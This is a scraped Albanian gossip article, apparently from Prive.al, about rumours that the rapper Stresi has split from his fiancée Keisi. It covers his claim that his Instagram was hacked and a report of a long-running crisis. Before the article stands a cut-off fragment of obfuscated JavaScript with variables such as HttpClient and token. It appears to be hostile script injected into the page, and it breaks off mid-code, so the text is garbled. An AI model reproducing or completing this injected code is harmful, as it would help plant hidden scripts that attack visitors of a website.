;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Stresi ndahet nga e fejuara?

By

Ka muaj të tërë që flitet për dasmën e Stresit me të fejuarën e tij Keisi, që do të zhvillohej në Santorini të Greqisë.

Lajmi u konfirmua edhe nga vetë reperi në shumë intervista i cili thoshte se dasma do të jetë shumë tradicionale.

Por, pak ditë më parë, ka pasur shumë thashetheme se ai dhe Keisi i kanë dhënë fund lidhjes së tyre pasi Stresi fshiu të gjitha fotografitë me të dashurën nga rrjetet sociale.

Artisti hodhi poshtë lajmet për ndarje gjatë emisionit “Fun Day” me Fatmën, duke u shprehur se fotografitë u larguan pasi dikush ia hakoi Instagramin.

Por sipas Panorama Plus, burime të afërta me çiftin kanë treguar se reperi dhe e fejuara e tij prej kohësh janë në një krizë njësoj si ajo që ndodhi gjatë muajit nëntor të vitit të kaluar.

Ju kujtojmë që Keisi jeton në Kanada ndërkaq Stresi në Shqipëri, dhe mund të jetë kjo njëra ndër arsyet e kësaj krize./Prive.al

Artikuj të ngjashëm